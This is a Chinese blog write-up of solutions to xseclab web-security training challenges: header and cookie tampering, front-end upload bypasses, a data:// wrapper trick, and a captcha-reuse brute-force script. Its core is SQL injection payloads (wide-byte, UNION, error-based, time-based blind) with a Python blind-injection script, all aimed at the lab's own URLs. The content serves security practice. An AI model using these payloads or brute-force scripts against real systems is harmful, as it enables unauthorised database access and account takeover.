网络安全实验是靶场总结

作者: hxf981224 分类: 未分类 发布时间: 2019-10-15 17:03

一基础关

三base65 解密

 Vm0wd2QyUXlVWGxWV0d4V1YwZDRWMVl3WkRSV01WbDNXa1JTVjAxV2JETlhhMUpUVjBaS2RHVkdXbFpOYWtFeFZtcEJlRll5U2tWVWJHaG9UV3N3ZUZadGNFZFpWMDE1VTJ0V1ZXSkhhRzlVVjNOM1pVWmtWMXBFVWxSTmF6RTBWMnRvUjFWdFNrZFhiR2hhWVRKb1JGWldXbUZqVmtaMFVteFNUbUY2UlRGV1ZFb3dWakZhV0ZOcmFHaFNlbXhXVm1wT1QwMHhjRlpYYlVaclVqQTFSMXBGV2xOVWJGcFlaSHBHVjFaRmIzZFdha1poVjBaT2NtRkhhRk5sYlhoWFZtMXdUMVF3TUhoalJscFlZbFZhY1ZadGRHRk5SbFowWlVoa1YwMUVSa1pWYkZKSFZqRmFSbUl6WkZkaGExcG9WakJhVDJOdFJraGhSazVzWWxob1dGWnRNSGRsUjBsNFUydGtXR0pIVWxsWmJGWmhZMnhXYzFWclpGZGlSbkJaV2xWYVQxWlhTbFpYVkVwV1lrWktTRlpxU2tabFZsWlpXa1prYUdFeGNGbFhhMVpoVkRKTmVGcElUbWhTTW5oVVZGY3hiMWRzV1hoWGJYUk9VakZHTlZaWE5VOWhiRXAwVld4c1dtSkhhRlJXTUZwVFZqSkdSbFJzVG1sU2JrSmFWMnhXWVZReFdsaFRiRnBZVmtWd1YxbHJXa3RTUmxweFVWaG9hMVpzV2pGV01uaHJZVWRGZWxGcmJGaFhTRUpJVmtSS1UxWXhXblZWYldoVFlYcFdlbGRYZUc5aU1XUkhWMjVTVGxkSFVsWlVWbHBIVFRGU1ZtRkhPV2hpUlhCNldUQmFjMWR0U2toaFJsSlhUVVp3VkZacVNrZFNiRkp6Vkcxc1UySnJTbUZXTW5oWFdWWlJlRmRzYUZSaVJuQlpWbXRXZDFZeGJISlhhM1JUVW14d2VGVXlkR3RoYlVwV1ZtcGFXbFpXY0doWlZXUkdaVWRPU0U5V1pHaGhNSEJ2Vm10U1MxUXlVa2RVYmtwaFVteEtjRlpxVG05V1ZscEhXVE5vYVUxWFVucFdNV2h2V1ZaS1IxTnVRbFZXTTFKNlZGUkdVMVp0UmtoUFZtaFRUVWhDU2xac1pEUmpNV1IwVTJ0a1dHSlhhR0ZVVnpWdlYwWnJlRmRyZEdwaVZrcElWbGQ0VDJGV1NYcFpNMmhYWVRGd2FGWlVSbFpsUm1SMVUyczFXRkpZUW5oV1YzaHJUa2RHUjFaWVpHaFNWVFZVVlcxNGQyVkdWbGRoUnpsb1RWWndlbFl5Y0VkV01ERjFZVWhLV2xaWFVrZGFWM2hIWTIxS1IxcEdaRTVOUlhCS1ZtMTBVMU14VlhoWFdHaFlZbXhhVmxsclpHOWpSbHB4VkcwNVYxWnRVbGhXVjNNMVZXc3hXRlZyYUZkTmFsWlVWa2Q0WVZKc1RuTmhSbFpYWWxaRmQxWnFRbUZaVm1SSVZXdG9hMUp0YUZSVVZXaERVMnhhYzFwRVVtcE5WMUl3VlRKMGIyRkdTbk5UYkdoVlZteHdNMVl3V25KbFJtUnlaRWR3YVZacmNFbFdiR1EwWVRKR1YxTnVVbEJXUlRWWVZGYzFiMWRHYkhGVGExcHNVbTFTV2xkclZURldNVnB6WTBaV1dGWXpVbkpXVkVaelZqRldjMWRzYUdsV1ZuQlFWa1phWVdReVZrZFdXR3hyVWtWS1dGUldXbmRsVm10M1YyNWtXRkl3VmpSWk1GSlBWMjFGZVZWclpHRldNMmhJV1RJeFMxSXhjRWhpUm1oVFZsaENTMVp0TVRCVk1VMTRWbGhvV0ZkSGFGbFpiWGhoVmpGc2MxcEhPVmRTYlhoYVdUQmFhMkpIU2toVmJHeGhWbGROTVZsV1ZYaFhSbFp5WVVaa1RtRnNXbFZXYTJRMFV6RktjMXBJVmxSaVJscFlXV3RhZDA1c1draGxSMFphVm0xU1IxUnNXbUZWUmxsNVlVaENWbUpIYUVOYVJFWmhZekZ3UlZWdGNFNVdNVWwzVmxSS01HSXlSa2RUYms1VVlrZG9WbFpzV25kTk1WcHlWMjFHYWxacmNEQmFSV1F3VmpKS2NsTnJjRmhpUmxweVdYcEdWbVZXVG5OaVJuQk9UVzFvV1ZkV1VrZGtNa1pIVjJ4V1UySkdjSE5WYlRGVFRWWlZlV042UmxkTlZuQjZXVEJhVjFkR1duTlRhMmhoVWtWYWNsVnFTa3RUVmxKMFlVWk9WMVpHV2pKV2JHTjRUa2RSZVZaclpGZFhSM2h5VldwT1UySXhiSE5XYm1SWFRWWndNRmt3WkVkWFIwcEhZMFpvV2sxSFVuWldNbmhoVjBaV2NscEhSbGRXTVVwUlZsUkNhMUl4U1hsU2EyaHBVbXMxY0ZsVVFuZE5iRnAwVFZSQ1ZrMVZNVFJXVnpWVFZqSkZlVlZ1UmxaaVIxRXdWbTE0YzJNeGNFaFBWbVJUWWtWd1dsWkhlR3BPVmxsNFYyNVNWbUpIYUZoV2FrNU9UVlphV0dNemFGaFNiRnA2V1ZWYWExUnNXWGxoUkVwWFRWWndhRlY2Umt0ak1WSjFWV3hPYVZJeFNuZFdha0pXVFVVeFIxZHJhR3RTTUZwdlZGZHpNV1ZzV1hsT1ZrNW9UVlZ3TUZaWE5VTldNa3BJWVVWU1ZXSllhR2hXYkZwUFZsWktjMVpyTlZkaWEwWXpWbXhqZDAxV1RYaFhhMmhVWWtkb2IxVnFRbUZXYkZwMFpVaGtUazFZUWxsYVZXaExZa1paZUZkcmNGaGhNWEJRVm1wS1JtVkhUa1ZXYkdSVFVsWndlVmRZY0VkV2JWRjNUVlZzYVZJeWFGUlpiR2h2VjFaa1dHVkhPVkpOVlRFMFdUQmFZVll4WkVoaFJsSlZWbTFTVkZwWGVITldiR1J6Vkcxb1YyRXpRWGhXVm1RMFpERlplVk5zYkZaaVIyaG9WV3RXWVdOc1ZuRlRhM1JVVm1zMU1GVnRlRTlpUjBwWllVUlNWMDFYVVhkWFZtUlNaVlphY2xwR1pGaFNNMmg1Vmxkd1ExbFhUa2RXYmxKc1UwZFNjMWxyV25OT1ZuQldZVWQwV0ZKcmJETldiWEJUVjJzeFIxTnNRbGROYWtaSFdsWmFWMk5zY0VoU2JHUk9UVzFvU2xZeFVrcGxSazE0VTFob2FsSlhVbWhWYkZKWFZERldjMkZGVGxSTlZuQXdWRlpTUTFack1WWk5WRkpYWWtkb2RsWXdXbXRUUjBaSVlVWmFUbEp1UW05V2JURTBZekpPYzFwSVNtdFNNMEpVV1d0b1EwNUdXbkpaTTJSUFZteHNORll5TlU5aGJFcFlZVVpzVjJFeFZYaGFSM2h6VmpGYVdXRkdhRk5pUm5BMlYxWldZV0V4VW5OWFdHeG9Va1Z3V0ZSV1duZGhSbFkyVW10MGFrMVdTakZXVjNoRFZqSktSMk5HYkZoV00xSjJWVlJHVTFZeGNFbFViR2hwVmxad1dGWkdXbUZqTURWSFYxaHNUMVpyTlc5VVZsWnpUbFpzVm1GRlRsZGlWWEJKV1ZWV1UxWXdNVmRqUjJoYVRWWndVRmt4V2xkak1XUnlUbFprVGxaWGQzcFdiWGhUVXpBeFNGTlliRk5oTWxKVldXMXpNVlpXYkhKYVJ6bFhZa1p3ZWxZeU5XdFVhekZZWlVaa1YwMXFWbkpXVkVwTFUxWkdjbUZHWkZOTk1taFZWbTF3UzFNeVRuTlVia3BvVW0xU1ZGUlVTbTlpTVZweVZXdDBVMDFYVWtoVk1uaHpXVlpKZWxGc1VsZGhhelYyVmpGYWExZEhWa2hQVmtwT1ZtdHdTVmRVUW1GaU1rWjBWbTVLV0dKSGVGZFpiR2hUVFRGd1YxZHRkR3BpUjFJd1ZERmtiMVl3TVVkaE0yeFhZbFJCZUZscVJscGxSbVJ5VjJ4U2FXSklRbGhXYlhSWFdWZFdjMWR1UmxOaVIxSnhWRlprVTJWc2JGWmFTRTVvVm14d2VWa3dVbUZXTURGWVZWaGtXRlp0VWxOYVZscGhZMnh3UjFwR2FGTk5NbWcxVm14a01GWXhUWGhhUldSV1lrZFNXVmx0TVZOak1WcDBaVWhPVDFadVFsZFpWV1F3VjBaSmQyTkZhRnBOUm5CMlZqSnplRk5IUmtabFJtUk9ZbTFvYjFacVFtRldNazV6WTBWb1UySkhVbGhVVmxaM1ZXeGFjMVZyVGxkaGVsWllWakZvYjJGc1NsaGhSemxXWVd0d2RsWkVSbFprTVZweVpFVTFhVkp1UVhkWGJGWnFUbGRGZDAxV1drNVdSa3BZVm0weGIyUnNXWGRYYlhSVVVqQmFTbFZ0ZUdGaFZrbDRVbGhrVjJKVVJUQlpla3BPWlVaa2RWVnNUbWxTTVVwVlYxZDBWMlF4WkhOWGEyaHNVak5DVUZadE1WTlRSbGw1VGxVNWFHSkZjREJhVldSSFZsWmFWMk5HWkZWV2JIQjZWbXBHWVZkWFJraGpSMnhYVjBWS1NGWnRlR3RPUjBWNFZXNVNVMkpyTlZsWmExcGhWMVphZEUxV1NrNVNiRmt5VlcweFIyRnRSalpXYkdoYVlURndURmxXV2t0ak1rNUhZa1pvVjAweFNtOVhhMUpIWVRGWmVGcElTbWhTTTFKVVZGVmFkMWRXV2tkYVNIQnNVbFJXV0ZadE5WTmhNVW8yWWtaa1ZtSllhSHBVYkZwelZtMUdSbFJzWkdsV1dFSktWMVpXVjFVeFdYZE5WbVJxVWpKb1lWUldXbmRWUm10NFYyeGthazFYVW5sVWJGcHJWR3hhV0dRemNGZGlXR2hVVlhwQmVGTkdTbGxoUjBaVFZqSm9WbGRYZEd0aU1rbDRWbTVTVGxaNmJHRldiWGgzWlZaYWRFMVZaRlZoZWtaWldsVmFhMVl3TVhGV2JrcFhWa1Z3VEZVeFdrZGpiVVpIV2taT1RrMXRhRlpXYlRGM1V6Rk5lVlJ1VGxWaWEzQnhWVzB4YjJOR1ZuUmxTR1JwVFZkU1dGWlhkREJWTURGWFlrUlNWMUl6YUhwWlYzaExaRlpHY2s5V1ZsZGxhMW95Vm1wR1lWbFdTWGhpUkZwVFlsZDRUMVpxUmt0VFZscHhVMVJHVTAxV1ZqVlZNblJoWVd4T1JrNVdaRnBpUmtwSVZtdGFXbVZYVmtoa1IzQnBVbTVDVjFaWE1UUmlNVlY1VWxod1VtSlZXbGhXYlRGU1RVWnNObEp0ZEZOTlYxSXhWbGQ0WVdGSFNrbFJiR1JYWWxSRk1GcEVTbGRqTVdSMVVteE9hVkl4U25oV1JscHJWVEpXYzJKR1dtRlRSVFZ2Vm0xNGQyVldhM2RYYm1SWFRXdHdTVlpIY0ZOV1YwVjVWV3hPWVZac2NHaFpNbmgzVWpGd1NHSkhiRk5YUlVwU1ZtMHdlRTVIUlhoV1dHaGhVbGRTVjFsclduZFdNV3hWVTJ4T2FrMVdjREJhVlZZd1lrZEtSMk5FUWxWV1ZrcFlWbXBCZUZKV1NuTmFSbkJwWW10S1RWWnRNSGhUTVdSWFZtNVdXR0pIVW05WlZFWjNZakZhV0UxVVVtaE5helV3Vm0xMGExbFdTWGxoUnpsVlZrVktURlpYZUdGak1XdDZZVVU1VTJKWWFGcFdhMXB2WWpKR2MxTnNhR2hUUlVwWFdXeG9UbVZHV2tWU2JVWnFUVmRTZWxrd1pEUmhWa3AxVVZoa1dHSkdXbkpWYWtaaFkyc3hWMWR0YkZOU2EzQm9WMVpTUjJReVRuTlhXR1JoVWxoU2NWbHNWVEZTTVZGNFYyMTBhRlp0VWtsWGFrNTNWakpHY2xOdGFGcGxhMXB5VmpCYVUyTnNjRWhTYkU1cFZtdHdWbFl4WkRCWlYxRjNUbFprV0dKc1NrOVdhMVpMV1ZaYWRHVkZaRTlTYkhBd1dsVmFhMVpYU2taalJXeGFUVE5DZVZWR1JUbFFVVDA5

脚本:

 import base64
 code = "解密内容"
 count = 0
 try:
 ​
      while True:
         code = base64.b64decode(code)
         count += 1
 except Exception:
     print (count, code)
 ​

四题据说MD5加密很安全,真的是么?

e0960851294d7b2253978ba858e24633

MD5解密为bighp

五题种族歧视

url:http://lab1.xseclab.com/base1_0ef337f3afbe42d5619d7a36c19c20ab/index.php

burp suite:拦截修改language

六题:HAHA浏览器

据说信息安全小组最近出了一款新的浏览器,叫HAHA浏览器,有些题目必须通过HAHA浏览器才能答对。小明同学坚决不要装HAHA浏览器,怕有后门,但是如何才能过这个需要安装HAHA浏览器才能过的题目呢?

url:http://lab1.xseclab.com/base6_6082c908819e105c378eb93b6631c4d3/index.php

burp suite 拦截:修改user-agent

七题key究竟在哪里呢?

上一次小明同学轻松找到了key,感觉这么简单的题目多无聊,于是有了找key的加强版,那么key这次会藏在哪里呢?

url:

http://lab1.xseclab.com/base7_eb68bd2f0d762faf70c89799b3c1cc52/index.php

burp suite拦截:发送到repeater模块点go 看raw

八 key又找不到了

设置burp suite 拦截:发送到repeater 点击go 看raw 下有 search_key.php

url:http://lab1.xseclab.com/base8_0abd63aa54bef0464289d6a42465f354/key_is_here_now_.php

九题冒充登陆用户

打开burp suite 设置拦截 发送带repeater 模块修改cookie login=1

得到key:

十题比较数字大小

只要比服务器上的数字大就可以了! 在搜索框内输入一串字符 发现最多输入三位所以修改maxlength

再输入一个5位数以上的数就显示flag了

十二题就不让你访问

查看robots.txt文件

访问url:http://lab1.xseclab.com/base12_44f0d8a96eed21afdc4823a0bf1a316b//9fb97531fe95594603aff7e794ab2f5f/login.php

上传关

一题请上传一张jpg格式的图片

解题地址:http://lab1.xseclab.com/upload1_a4daf6890f1166fd88f386f098b182af/

右击查看页面源代码

 <html>
  <head>
  <meta http-equiv=Content-Type content="text/html;charset=utf-8">
  <title>upload 1</title>
  <script>
  function check(){
  var filename=document.getElementById("file");
  var str=filename.value.split(".");
  var ext=str[str.length-1];
  if(ext=='jpg'){
  return true;
  }else{
  alert("请上传一张JPG格式的图片!")
  return false;
  }
  return false;
  }
  </script>
  </head>
  <body>
  请上传一张JPG格式的图片!
  <form action="upload_file.php" method="post" enctype="multipart/form-data" onsubmit="return check()">
  <label for="file">文件名</label>
  <input type="file" name="file" id="file" />
  <br />
  <input type="submit" name="submit" value="上传" />
  </form>
  </body>
 </html>

前端检测 设置brp suite拦截 修改上传类型

1 上传jpg文件,拦截

弹出 flag:

二题

 ​ 解题跟第一题一样 

三题

源码

 <html>
  <head>
  <meta http-equiv=Content-Type content="text/html;charset=utf-8">
  <title>upload 1</title>
  <script>
  function check(){
  var filename=document.getElementById("file");
  var str=filename.value.split(".");//以点为分割线,分割为数组
  var ext=str[1];//去第二个元素
  if(ext==='jpg'){
  return true;
  }else{
  alert("请上传一张JPG格式的图片!");
  return false;
  }
  return false;
  }
  </script>
  </head>
  <body>
  请上传一张JPG格式的图片!
  <form action="upload_file.php" method="post" enctype="multipart/form-data" onsubmit="return check()">
  <label for="file">文件名</label>
  <input type="file" name="file" id="file" />
  <br />
  <input type="submit" name="submit" value="上传" />
  </form>
  </body>
 </html>
 ​

所以打开burp suite 设置拦截

上传jpg.后缀文件拦截

注入关

一题最简单的SQL注入

题目地址:url=http://lab1.xseclab.com/sqli2_3265b4852c13383560327d1c31550b60/index.php

万能密码绕过 admin’ or1=1# 没有什么过滤

二题最简单的SQL注入(熟悉注入环境)

题目url:http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php

查看页面源代码有提示 id=1

构造payload id=1 or 1=1

三题防注入(宽字节注入)

url:http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php

源码:

 <html>
     <head>
         <title>SQLi4_article</title>
     </head>
     <body>      <div>
             <h2>blog system</h2>
             <div class="content">my blog test</div>
         </div>
                 
     </body>
 </html>
 <!-- tips: id=1

payload:id=1%df’%23

1:注出数据库名

 http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df'union select 1,2,database()%23

2:注出表名

 http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

3:注出列名

 http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df'union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7361655f757365725f73716c6934%23

4注出数据库内容

 http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1%df'union select 1,group_concat(id,title_1,content_1),3 from sae_user_sqli4%23

四题到底能不能回显(limit限制)

url:http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0&num=1

1:注入出数据名

 ​

2:注入出表名

 http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(table_name)from information_schema.tables where table_schema=database()))),1)%23&num=1

3注入出列名

 http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(column_name)from information_schema.columns where table_name=0x75736572))),1)%23&num=1

4:注入出数据库内容//有限制,每次只能查询一个字段

 http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0 procedure analyse(extractvalue(rand(),concat(1,(select group_concat(table_name)from information_schema.tables where table_schema=database()))),1)%23&num=1

五题邂逅(图片报头宽字节注入)

url:http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/

访问图片网址: burp suite拦截:在报头进行注入

六题ErrorBased (报错注入)

url:http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/index.php?username=admin

payload:username=admin’ %23

1:注入出数据库名

 ​

2:注入出表名:

 ?username=admin' and (select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database()),0x7e),1))%23

3:注入出字段名

 ?username=admin' and (select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='motto'),0x7e),1))%23

4:注入出数据库内容

 ​

七题盲注

测试代码

 http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin' and (sleep(5))%23

脚本

 # coding=utf-8
 import requests
 ​
 db_len = 0
 url = 'http://lab1.xseclab.com/sqli7_b95cf5af3a5fbeca02564bffc63e92e5/blind.php?username=admin'
 #测试数据库长度
 while True:
    db_len += 1
    payload = url + "'"+"and if(length(database())>{0},1,sleep(3))%23".format(db_len)
    print(payload)
    start_time = time.time()
    res = requests.get(payload).text
    #print(url_req)
    stop_time = time.time()
    if( (stop_time - start_time) > 2.5):
        break
 ​
 print("database_length",db_len)
 ​
 ​
 #猜解数据库名
 db_name =""
 for i in range(8):
    for c in range(32,127):
        payload = url + "'" +"and if(ascii(substr(database(),{0},1))>{1},1,sleep(3))%23".format(i+1,str(c))
        print(payload)
        start_time = time.time()
        res = requests.get(payload).text
        stop_time = time.time()
        if ((stop_time - start_time) > 2.5):
            db_name += chr(c)
            print(db_name)
            break
 ​

八题:SQL注入通用防护

分值: 250

小明写了一个博客系统,为了防注入,他上网找了一个SQL注入通用防护模块,GET/POST都过滤了哦!

url:http://lab1.xseclab.com/sqli8_f4af04563c22b18b51d9142ab0bfb13d/index.php?id=1

刚开始做的时候无从下手,不过看了大佬的wp,知道可以用sqlmap来寻找注入点,可以找到实在cookie中:

脚本关

一题key又又找不到了

url:http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/index.php

查看页面源代码

 ​
 <html>
     <head>
         <meta http-equiv="content-type" content="text/html;charset=utf-8">
     </head>
     <body>
         <a href="./search_key.php">_到这里找key__</a>
     </body>
 </html>

发现有search.php 代开发现没有key,所以简单写一个脚本

 import  requests
 url="http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/search_key.php"
 ​
 req = requests.get(url).text
 print(req)

运行脚本发货key

二题:快速口算

url:http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php

发现题目要求两秒钟算出平提交所以只能写脚本了

页面源代码:

 ​
 <html>
     <head>
         <meta http-equiv=Content-Type content="text/html;charset=utf-8">
     </head>
     <body>
       
         <form action="" method="post">
             请在2秒内口算结果并提交!<br/>
             2828*38414+1564*(2828+38414)=<input type="text" name="v"/>
             <input type="submit" value="提交"/>
         </form>
     </body>
 </html>
 ​

脚本:

 import requests
 import re
 url = "http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php"
 s = requests.session()
 ​
 r = s.get(url)
 red = str(re.findall('(.*?)=<input type="text" name="v"/>',r.text))//爬去计算题目
 red = red[14:]
 red = red[:-2]
 ​
 key = eval (red)
 print(red)
 print(key)
 data = {"v":key}
 a = s.post(url,data=data).content.decode('utf-8')
 print(a)

运行脚本即可返回key

三题这个题目是空的

Tips:这个题目真不是随便设置的。 什么才是空的呢? 通关地址:没有,请直接提交答案(小写即可)

所在输入框写入null ,即可得到key

五题:逗比验证码第一期

源码:

 ​
 <html>
     <head>
         <meta http-equiv="content-type" content="text/html;charset=utf-8">
     </head>
     <body>
        登陆密码是4位纯数字数,第一位不为0
    <form action="login.php" method="POST">
            User: <input type="text" value="admin" name="username"><br>
            Password: <input type="password" value="" name="pwd"><br>
            Vcode: <input type="text" value="" name="vcode"><br>
             <img src="http://vc.sinaapp.com/img.php?key=k-15692259986111"><br>
             <input type="submit" value="submit" name="submit"><br>
         </form>
     </body>
 </html>

根据源代码可以看出:二维码来自一个网址:

burp suite 拦截数据包

发现多次提交后只要Cookie不变,验证码就不会改变,这就想到了验证码创建一个会话(Session)

脚本:

 import requests
 import re
 from PIL import  Image
 ​
 url = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php"
 login_url = "http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php"
 ​
 s = requests.session()
 ​
 r = s.get(url).text
 ​
 p = str(re.findall(r'<img src="(.*?)"><br>',r))
 p = p[2:]
 p = p[:-2]
 print(p)
 p1 = requests.get(p)
 f= open('1.jpg','wb').write(p1.content)
 im=Image.open('1.jpg')
 Image._show(im)
 print("请输入验证码:")
 vcode=input()
 for i in range(999,10000):
     data = {"username":"admin","pwd":str(i),"vcode":vcode,"submit":"submit"}
     key = s.post(login_url,data=data).text
     print(key)
     print("try:"+str(i))
     if not "error" in key:
         print(key)
         break
 ​

运行脚本即可得到key

方法二burp suite 爆破,

爆破结果为1238

六题/七题

给五题一样,就是吧验证码设置为空进行爆破就OK了

八题微笑一下就能过关了

url:http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php

页面源代码

 ​
   
 <!doctype html>
 <html lang="en">
 ​
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
 <title>Show me your smile :)</title>
 <link rel="stylesheet" href="style.css">
 </head>
 ​
 <body>
 <br><br><br><br><br><br><br>
 <div class="loginform cf">
     <form name="login" action="index.php" method="POST" accept-charset="utf-8">
         <ul>
             <li>
                 <label for="SMILE">请使用微笑过关<a href="?view-source">源代码</a></label>
                 <input type="text" name="T_T" placeholder="where is your smile" required>
             </li>
             <li><input type="submit" value="Show"> </li>
         </ul>
     </form>
 </div>
 <div style="text-align:center;clear:both">
 </div>
 </body>
 ​
 </html>

查看源代码发现?view-source源代码页面地址打开

 <?php  
     header("Content-type: text/html; charset=utf-8");
     if (isset($_GET['view-source'])) {
         show_source(__FILE__);
         exit();
     }
 ​
     include('flag.php');
 ​
     $smile = 1;  
 ​
    if (!isset ($_GET['^_^'])) $smile = 0;  
     if (preg_match ('/\./', $_GET['^_^'])) $smile = 0;  
     if (preg_match ('/%/', $_GET['^_^'])) $smile = 0;  
     if (preg_match ('/[0-9]/', $_GET['^_^'])) $smile = 0;  
     if (preg_match ('/http/', $_GET['^_^']) ) $smile = 0;  
     if (preg_match ('/https/', $_GET['^_^']) ) $smile = 0;  
     if (preg_match ('/ftp/', $_GET['^_^'])) $smile = 0;  
     if (preg_match ('/telnet/', $_GET['^_^'])) $smile = 0;  
     if (preg_match ('/_/', $_SERVER['QUERY_STRING'])) $smile = 0;
     if ($smile) {
         if (@file_exists ($_GET['^_^'])) $smile = 0;  
     }  
     if ($smile) {
         $smile = @file_get_contents ($_GET['^_^']);//file_get_contents() 函数把整个文件读入一个字符串中  
         if ($smile === "(●'◡'●)") die($flag);  
     }  
 ?>  
 <!doctype html>
 <html lang="en">
 ​
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
 <title>Show me your smile :)</title>
 <link rel="stylesheet" href="style.css">
 </head>
 ​
 <body>
 <br><br><br><br><br><br><br>
 <div class="loginform cf">
     <form name="login" action="index.php" method="POST" accept-charset="utf-8">
         <ul>
             <li>
                 <label for="SMILE">请使用微笑过关<a href="?view-source">源代码</a></label>
                 <input type="text" name="T_T" placeholder="where is your smile" required>
             </li>
             <li><input type="submit" value="Show"> </li>
         </ul>
     </form>
 </div>
 <div style="text-align:center;clear:both">
 </div>
 </body>
 ​
 </html>

发现变量为^_^但是下面进行了过滤

既要对”^^”赋值,又得想办法去掉”^^”中的”_”,那么可以采用Url编码变为”%5f”.所以我们输入就应该为 “^%5f^”.

代码把 http https ftp telnet 这些给过滤了,而又要求通过file_get_contents()取出$GET[‘^^’]里的值.但,$GET[‘^^’]又必须不存在.所以$GET[‘^^’]只能是字符串”(●’◡’●)”,不可能是文件名.那么file_get_contents()里的参数应该是啥呢.查了一下,发现data://完美符合.所以我们输入就应该为”^%5f^=data:,(●’◡’●)”

十题:逗比的手机验证码

66的验证码可以用在67上,所以用66获取验证码,用67 和验证码登录

?

综合关

第一题渗透测试第

注意:该题目模拟真实环境,故具有排他性,请选择合适的时间段完成该题。 你只有一部可用手机,手机号码会在需要手机号码的页面中给出。 通关地址

根据页面有登录,忘记密码,注册用户三个选项

点忘记密码,查看页面源代码

输入用户名和电话号码后发现不能获取验证码,我们转到注册界面,注册自己的用户,注册成功之后会转到

我们刚在页面源代码中发现了一个手机号所以我们这个绑定这个手机号并且拦截,

会反弹手机号绑定成功,再回到主页面,进入忘记密码,找回密码之后

从新登录就可登录拿到key

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。 必填项已用*标注

标签云